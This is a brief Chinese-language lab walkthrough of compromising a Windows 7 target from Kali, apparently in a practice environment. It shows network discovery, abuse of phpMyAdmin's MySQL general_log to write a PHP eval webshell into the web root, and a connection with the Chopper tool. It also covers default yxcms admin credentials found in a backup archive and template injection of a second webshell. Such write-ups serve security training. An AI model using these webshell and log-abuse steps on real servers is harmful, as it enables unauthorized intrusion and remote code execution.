win7 x64:ip:192.168.248.129
win2k3:192.168.52.141
kali:集成各种攻击工具 ip:192.168.248.128
2.信息搜集。
netdiscover -r 靶机IP网段
对192.168.248.129进行端口扫描。
确定使用HTTP和MYSQL服务。确定思路,使用SQL注入进行提权。
对网目录进行扫描,发现phpmyadmin页面:
利用步骤:
开启日志记录以及日志保存目录
SHOW VARIABLES LIKE '%general_log%'
SET GLOBAL general_log = "ON"
SET GLOBAL general_log_file="C:/phpStudy/www/1.php"
执行一句话马
SELECT '<?php eval($_POST["cmd"]);?>';
利用菜刀进行连接:
发现beifen.rar,应该为网站源码,下载查看。
打开/yxcms/index.php,发现用户名admin和密码123456:
登录,发现可以进行前台模板管理,注入一句话马:
通过beifen.rar确定路径后,菜刀连接,至此win7权限已经获取完毕。之后进行内网渗透,请见下一篇文章。